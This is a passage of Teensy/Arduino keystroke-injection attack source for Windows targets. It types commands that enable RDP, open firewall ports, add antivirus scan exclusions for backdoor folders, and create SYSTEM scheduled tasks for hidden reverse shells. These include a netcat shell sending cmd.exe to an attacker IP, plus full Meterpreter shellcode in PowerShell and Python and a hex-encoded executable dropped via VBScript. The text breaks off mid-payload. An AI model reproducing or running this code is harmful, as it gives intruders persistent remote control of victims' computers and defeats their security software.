user's login session under the context of a different user (not currently used in this sketch) **/ void win_switchUserContext(const char *taskpath, const char *taskname) { win_openCmd(); delay(500); Keyboard.print(F("taskkill /F /IM ")); // kill explorer.exe Keyboard.println(taskname); delay(500); Keyboard.print(F("runas /user:")); Keyboard.print(F(local_user)); Keyboard.println(F(" ")); Keyboard.print(F(taskpath)); Keyboard.println(taskname); delay(500); Keyboard.println(local_pass); Keyboard.println("exit"); } /** make a port-based firewall exception rule **/ void win_firewallPortRule(char *port, char *rulename) { win_openCmd(); delay(1000); if (!flag.is_win7) { // winxp firewall rule Keyboard.print(F("netsh firewall add portopening all ")); Keyboard.print(F(port)); Keyboard.print(F(" ")); Keyboard.print(F(rulename)); Keyboard.println(F(" enable all")); } else { //win7 firewall rule Keyboard.print(F("netsh advfirewall firewall add rule name=")); Keyboard.print(F(rulename)); Keyboard.print(F(" dir=in action=allow protocol=TCP localport=")); Keyboard.println(F(port)); } Keyboard.println("exit"); } /** make an application-based firewall rule (such as ftp.exe) note: the program parameter must include the full path (i.e., c:\\windows\\system32\\ftp.exe) **/ void win_firewallProgramRule(char *program, char *rulename) { win_openCmd(); delay(1000); if (!flag.is_win7) { //win xp firewall rule Keyboard.print(F("netsh firewall add allowedprogram ")); Keyboard.print(F(program)); Keyboard.println(F(" enable")); } else { // win7 firewall rule Keyboard.print(F("netsh advfirewall firewall add rule name=")); Keyboard.print(F(rulename)); Keyboard.print(F(" dir=in action=allow program=\"")); Keyboard.println(F(program)); } Keyboard.println("exit"); } /** This function will disable an existing firewall rule given its name for example, Windows 7 has a "File Transfer Program" rule that would block ftp by default. To disable it, use: win_firewallDisableRule("File Transfer Program") Currently only for Win 7 **/ void win_firewallDisableRule(char *rulename) { win_openCmd(); delay(1000); if (flag.is_win7) { Keyboard.print(F("netsh advfirewall firewall set rule name=\"")); Keyboard.print(F(rulename)); Keyboard.println(F("\" new enable=no")); } Keyboard.println("exit"); } /** Enable RDP and open firewall **/ void win_enableRdp(void) { win_openCmd(); delay(1000); Keyboard.println(F("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v AllowTSConnections /t REG_DWORD /d 1 /f")); Keyboard.println(F("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f")); Keyboard.println(F("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f")); Keyboard.println(F("sc start termservice")); delay(1000); Keyboard.println("exit"); delay(1000); win_firewallPortRule("3389", "rdp"); } /** The following functions create a persistent, recurring tasks to get a reverse shell/RDP Command: schtasks /create Options Used: /TN [taskname] -- uniquely name the task /RU [username] -- account under which to run task /SC [interval] -- task frequency type (MINUTE, HOUR, etc) /MO [interval value] -- task frequency value /TR [path/filename] -- location of netcat on the victim machine (see config section) **/ /** creates recurring task for vbscript shell **/ void win_createVBShellScheduledTask(void) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_vbscript_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \"")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.println(F(win_vbscript_file_name)); delay(300); Keyboard.print(F("schtasks /run /TN ")); delay(300); Keyboard.println(win_vbscript_task_name); delay(300); Keyboard.println("exit"); } /** creates recurring task for netcat shell **/ void win_createNetcatScheduledTask(void) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_netcat_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \" ")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.print(F(netcat_remote_file)); delay(300); Keyboard.print(F(" ")); delay(300); Keyboard.print(F(remote_ip)); delay(300); Keyboard.print(F(" ")); delay(300); Keyboard.print(F(remote_nc_port)); delay(300); Keyboard.println(" -e cmd.exe\"");; delay(300); Keyboard.print(F("schtasks /run /TN ")); Keyboard.println(win_netcat_task_name); delay(300); Keyboard.println("exit"); } /** creates recurring task for python shell; takes path to python.exe as arg **/ void win_createPythonScheduledTask(const char *path) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_python_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \"")); delay(300); Keyboard.print(F(path)); delay(300); Keyboard.print(F(" ")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.println(F(win_python_file_name)); delay(300); Keyboard.print(F("schtasks /run /TN ")); Keyboard.println(win_python_task_name); delay(300); Keyboard.println("exit"); } /** creates recurring task for powershell shell **/ void win_createPowerShellScheduledTask(void) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_powershell_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File ")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.println(F(win_psscript_file_name)); delay(300); Keyboard.print(F("schtasks /run /TN ")); Keyboard.println(win_powershell_task_name); delay(300); Keyboard.println("exit"); } /** In many cases, even local Admins are prevented from disabling AV due to GPOs, however they may not be restricted from adding file/folder scanning exceptions This function will add a folder exception for storing executables, backdoors, etc Attempts to perform this function reliably via registry changes were not successful, even under admin accounts so this GUI method was chosen This still requires an account with Admin privs to execute! **/ void win_securityEssentialsGUIException(void) { win_openCmd(); delay(300); Keyboard.println("taskkill /F /IM msseces.exe"); // necessary if it is already running to reset the GUI focus // so we always start from the same place delay(300); Keyboard.println("exit"); delay(500); if (!flag.is_win7) { // if Win XP, open from cmd using default path (not ideal) win_openCmd(); delay(500); Keyboard.println("\"C:\\Program Files\\Microsoft Security Client\\msseces.exe\""); } else { // otherwise, use search function to open it, regardless of install function //open search Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); clearKeys(); delay(500); // open Security Essentials GUI Keyboard.println("Security Essentials"); } //keystrokes to enter folder exception to real-time protection delay(2500); sendKey(KEY_TAB); sendKey(KEY_ENTER); // Select "Change my Scan Schedule" to go to "Settings" tab delay(500); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); // arrow down to "Excluded Files and Locations" sendKey(KEY_TAB); Keyboard.print(win_local_target_folder); // enter folder path delay(500); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_ENTER); // "Add" delay(500); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_ENTER); // "Save Changes" delay(500); sendKey(KEY_LEFT); sendKey(KEY_ENTER); // confirm security prompt delay(500); win_closeWindow(); // close Security Essentials window if (!flag.is_win7) { // exit command prompt Keyboard.println("exit"); } } /** In many cases, even local Admins are prevented from disabling AV due to GPOs, however they may not be restricted from adding file/folder scanning exceptions This function will add a folder exception for storing executables, backdoors, etc via registry update **/ void win_sepRegException(void) { char *regkey = NULL; if (!flag.is_win7) { regkey = "\"HKLM\\SOFTWARE\\Symantec\\Symantec Endpoint Protection\\AV\\Exclusions\\ScanningEngines\\Directory\\Client\\1234567890\""; } else { regkey = "\"HKLM\\SOFTWARE\\Wow6432Node\\Symantec\\Symantec Endpoint Protection\\AV\\Exclusions\\ScanningEngines\\Directory\\Client\\1234567890\""; } win_openCmd(); // open cmd.exe delay(1000); Keyboard.print(F("reg add ")); Keyboard.println(F(regkey)); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.print(F(" /v DirectoryName /t REG_SZ /d ")); Keyboard.print(win_local_target_folder); Keyboard.println(F(" /f")); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ExcludeSubDirs /t REG_DWORD /d 1 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ExtensionList /t REG_SZ /d \"\" /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v FirstAction /t REG_DWORD /d 17 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v Owner /t REG_DWORD /d 4 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ProtectionTechnology /t REG_DWORD /d 1 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ScanCategories /t REG_DWORD /d 4294967295 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v SecondAction /t REG_DWORD /d 17 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ThreatName /t REG_SZ /d \"Default Symantec Setting (Don't Delete)\" /f"); delay(300); Keyboard.println("n"); // just in case the rules already exist, this will quiet the prompt Keyboard.println("exit"); } /** This function attempts to locate installed AV and create a folder-based scan exception It currently only looks for Symantec SEP and Windows Security Essentials If an exception is successful or if no AV is found, it sets flag.persist to true so that persistent shells can be tried first **/ void win_avException(void) { if (win_checkIfInstalled("Symantec")) { // exception for Symantec SEP win_sepRegException(); flag.persist = 1; //assume AV exception, try persistent shell delay(300); } else if (win_checkIfInstalled("Security Essentials")) { // exception for Windows Security Essentials win_securityEssentialsGUIException(); flag.persist = 1; // assume AV exception, try persistent shell delay(300); } else { flag.persist = 1; // default to no AV found, try a peristent shell first } } /** ============= Reverse Shells ============= **/ /** The following functions execute reverse shells using various tools (python, vbscript, powershell **/ /** manually open netcat reverse shell to attacker ip/port may require download of netcat via fetch file function for persistent connection use win_createNetcatScheduledTask() instead **/ void win_manualNetcatLaunch(void) { win_openCmd(); delay(300); Keyboard.print(F("start /B ")); Keyboard.print(F(win_local_target_folder)); Keyboard.print(F(netcat_remote_file)); Keyboard.print(F(" ")); Keyboard.print(F(remote_ip)); Keyboard.print(F(" ")); Keyboard.print(F(remote_nc_port)); Keyboard.println(F(" -e cmd.exe")); delay(300); Keyboard.println("exit"); } /** use powershell to execute meterpreter shell from command line Full credit to Offsec crew: this is just a slighlty modified version of the original function function from Github peensy code **/ void win_powershellRevMeterpreter(void) { delay(1000); char *iphex = makeIPHex("powershell"); // converts ip address into hex, returns desired python format win_checkArch(); delay(500); Keyboard.print(F("$code = '")); Keyboard.print(F("[DllImport(\"kernel32.dll\")]")); Keyboard.print(F("public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);")); Keyboard.print(F("[DllImport(\"kernel32.dll\")]")); Keyboard.print(F("public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);")); Keyboard.print(F("[DllImport(\"msvcrt.dll\")]")); Keyboard.print(F("public static extern IntPtr memset(IntPtr dest, uint src, uint count);';")); Keyboard.print(F("$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru;")); if (flag.is_64bit) { // arch = 64 bit meterpreter char *porthex = makePortHex("powershell", "met64"); // converts port into hex; returns desired python format Keyboard.print(F("$p00=0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52;")); Keyboard.print(F("$p01=0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48;")); Keyboard.print(F("$p02=0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9;")); Keyboard.print(F("$p03=0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41;")); Keyboard.print(F("$p04=0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48;")); Keyboard.print(F("$p05=0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01;")); Keyboard.print(F("$p06=0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48;")); Keyboard.print(F("$p07=0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0;")); Keyboard.print(F("$p08=0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c;")); Keyboard.print(F("$p09=0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0;")); Keyboard.print(F("$p10=0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04;")); Keyboard.print(F("$p11=0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59;")); Keyboard.print(F("$p12=0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48;")); Keyboard.print(F("$p13=0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33;")); Keyboard.print(F("$p14=0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00;")); Keyboard.print(F("$p15=0x49,0x89,0xe5,0x49,0xbc,0x02,0x00;")); Keyboard.print(iphex); Keyboard.print(porthex); Keyboard.print(F("$p16=0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c;")); Keyboard.print(F("$p17=0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff;")); Keyboard.print(F("$p18=0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2;")); Keyboard.print(F("$p19=0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48;")); Keyboard.print(F("$p20=0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99;")); Keyboard.print(F("$p21=0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec;")); Keyboard.print(F("$p22=0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41;")); Keyboard.print(F("$p23=0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41;")); Keyboard.print(F("$p24=0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41;")); Keyboard.print(F("$p25=0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31;")); Keyboard.print(F("$p26=0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8;")); Keyboard.print(F("$p27=0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;")); Keyboard.print(F("[Byte[]];")); Keyboard.print(F("[Byte[]]$sc64 = $p00+$p01+$p02+$p03+$p04+$p05+$p06+$p07+$p08+$p09+$p10+$p11+$p12+$p13+$p14+$p15+$rport+$rhost+$p16+$p17+$p18+$p19+$p20+$p21+$p22+$p23+$p24+$p25+$p26+$p27;")); } else {// arch = 32 bit meterpreter char *porthex = makePortHex("powershell", "met32"); // converts port into hex; returns desired python format Keyboard.print(F("$p01=0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b;")); Keyboard.print(F("$p02=0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0;")); Keyboard.print(F("$p03=0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57;")); Keyboard.print(F("$p04=0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01;")); Keyboard.print(F("$p05=0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b;")); Keyboard.print(F("$p06=0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4;")); Keyboard.print(F("$p07=0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b;")); Keyboard.print(F("$p08=0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24;")); Keyboard.print(F("$p09=0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d;")); Keyboard.print(F("$p10=0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07;")); Keyboard.print(F("$p11=0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00;")); Keyboard.print(F("$p12=0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff;")); Keyboard.print(F("$p13=0xd5,0x97,0x6a,0x05,0x68;")); Keyboard.print(F("$p14=0x68,0x02,0x00;")); Keyboard.print(iphex); Keyboard.print(porthex); Keyboard.print(F("$p15=0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff;")); Keyboard.print(F("$p16=0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56;")); Keyboard.print(F("$p17=0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00;")); Keyboard.print(F("$p18=0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56;")); Keyboard.print(F("$p19=0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;")); Keyboard.print(F("[Byte[]];")); Keyboard.print(F("[Byte[]]$sc64 = $p01+$p02+$p03+$p04+$p05+$p06+$p07+$p08+$p09+$p10+$p11+$p12+$p13+$rhost+$p14+$rport+$p15+$p16+$p17+$p18+$p19;")); } Keyboard.print(F("[Byte[]]$sc = $sc64;$size = 0x1000;")); Keyboard.print(F("if ($sc.Length -gt 0x1000) {$size = $sc.Length};")); Keyboard.print(F("$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);")); Keyboard.print(F("for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};")); Keyboard.print(F("$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };")); } // Echos the inline_reverse_meterpreter into a file ( %WINDIR%\system.ps1), and runs it as a 10 minute scheduled task called Maint. // The task runs as SYSTEM, thus hiding the process from the active user. void win_persistentPowershellRevMeterpreter (void) { const char *psfilename = "system.ps1"; win_openCmd(); delay(500); Keyboard.print(F("echo ")); delay(700); win_powershellRevMeterpreter(); delay(1000); Keyboard.print(F(" > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(win_psscript_file_name); delay(700); Keyboard.println("exit"); delay(700); win_createPowerShellScheduledTask(); delay(2000); } /** windows reverse meterpreter (32-bit) shell in python either executed in memory or written to disk **/ void win_pyShell(boolean mem, char *path){ delay(1000); char *iphex = makeIPHex("python"); // converts ip address into hex, returns desired python format char *porthex = makePortHex("python", "met32"); // converts port into hex; returns desired python format if (mem == true){ win_openPythonPrompt(path); // if executing from memory, open the python prompt } else { win_openCmd(); // otherwise, create a python script delay(500); Keyboard.print(F("echo ")); } delay(1000); Keyboard.print("from ctypes import *; "); Keyboard.print("buf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\"; "); Keyboard.print("buf += \"\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\"; "); Keyboard.print("buf += \"\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\"; "); Keyboard.print("buf += \"\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\"; "); Keyboard.print(F("buf += \"\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68")); Keyboard.print(F(iphex)); Keyboard.print(F("\\x68\\x02\\x00")); Keyboard.print(F(porthex)); Keyboard.print("\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\"; "); Keyboard.print("buf += \"\\xd5\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x01\\xc3\\x29\\xc6\\x85\\xf6\\x75\\xec\\xc3\"; "); Keyboard.print("memorywithshell = create_string_buffer(buf, len(buf)); "); Keyboard.print("shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p)); "); if (mem == true){ Keyboard.println("shellcode()"); // execute in memory } else { Keyboard.print(F("shellcode() > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(F("shell.py")); // write script to file delay(200); Keyboard.println("exit"); } delete(iphex); // free up mem alloc delete(porthex); } /** Meterpreter Shell in vbscript creation instructions for minimal size exe: 1) generate c shellcode using metasploit, place in simple c program as unsigned char buf[] int main(){ int(*func)(); func = (int(*)()) buf; (int)(*func)(); }  2) wine gcc.exe -s shell.c -o shell.exe 3) upx -4 shell.exe 4) grab hex of shell.exe (hex editor of choice) and place in text file (shell.txt) 5) cat shell.txt | sed 's/\(.\{2\}\)/\1 /g' > newshell.txt -- take heed of trailing 00's may need to add if truncated This could definitely be compressed further by zipping all nulls and incorporating an unpack/unzip function in your vbscript though I chose to leave as-is **/ void win_vbscriptRevShell(boolean fromcmd) { delay(1000); win_openCmd(); makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *iphex = makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *porthex = makePortHex("vbscript", "met32"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' const char *filename = "shell.vbs"; delay(1000); Keyboard.print(F("echo hexstr = \"4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f ")); Keyboard.print(F("53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 ae 13 53 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 16 00 10 00 00 00 10 00 00 00 ")); Keyboard.print(F("90 00 00 c0 ab 00 00 00 a0 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 ")); Keyboard.print(F("03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 ad 00 00 18 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 ")); Keyboard.print(F("90 00 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 00 00 00 a0 00 00 00 0e 00 00 00 02 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 b0 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 ")); Keyboard.print(F("c0 33 2e 30 38 00 55 50 58 21 0d 09 02 04 ed 38 35 fb 56 f6 f2 5b ce 83 00 00 a4 0b 00 00 00 1e 00 00 26 01 00 72 9d f9 ff ff 55 89 e5 53 83 ec 34 a1 64 30 40 00 85 ")); Keyboard.print(F("c0 74 1c c7 44 24 08 00 07 04 b6 db 7e 9f 02 04 24 0e ff d0 24 0c 0b 10 11 26 7d df ed fe e8 01 00 0b 24 50 05 04 64 04 05 44 c7 45 f0 22 8d 6d 5d fb b6 06 89 34 10 ")); Keyboard.print(F("a1 40 21 22 08 0c 0f f4 3f 36 f2 d7 06 08 48 04 50 40 50 3c 0a cc a1 30 50 df 7d ff 7e 6d 75 4a 0d d4 8b 15 44 32 10 0c 06 7c 83 e4 f0 dd fb fd 76 07 08 c4 19 dc 8b ")); Keyboard.print(F("48 08 a1 3e 08 04 fb 7b d7 be a1 40 89 47 1b 03 88 89 c3 22 e4 89 1c 0e 7b 7b 17 fb 0b 2c a3 43 24 8b 1d f8 60 09 8b 43 10 28 80 1d 8b 3d 0a ec 6c 19 43 30 13 27 bc ")); Keyboard.print(F("1d 32 50 e9 04 00 7a 90 0f 14 bb df 6e ed 8b 45 08 7c 01 3d 91 13 c0 77 3b 3d 8d 06 72 4c 11 46 08 c2 bb 01 18 20 04 28 bb 37 f7 7f 3a f4 83 f8 01 0f 84 ed 0d d3 0f ")); Keyboard.print(F("85 9a 07 31 c0 fc bd bb fd 83 c4 14 5b c9 c2 29 3d 94 3a 74 4d 3d 96 06 18 3d 93 60 cf df df 75 e1 eb b5 90 3d 05 10 3d 3d 1d d0 54 ac e1 61 2f 07 54 74 64 92 b3 14 ")); Keyboard.print(F("ee be bb 10 82 b8 ff 00 eb a5 90 31 db ab 01 2d 90 ed 0e 64 c0 35 0b 4a 86 84 79 ec 0b 16 cc 2b 18 39 34 54 b6 2c e6 12 16 12 46 d9 7c 6c 59 ca 0e c8 1b 62 1b 2d fb ")); Keyboard.print(F("24 ac 09 85 db 75 0a 59 e1 70 58 c3 12 1e 2e 66 5b 5a da 0d 7f 6e 18 2e 35 ff 15 f0 a7 e8 7c fd 2b 90 c1 1e c9 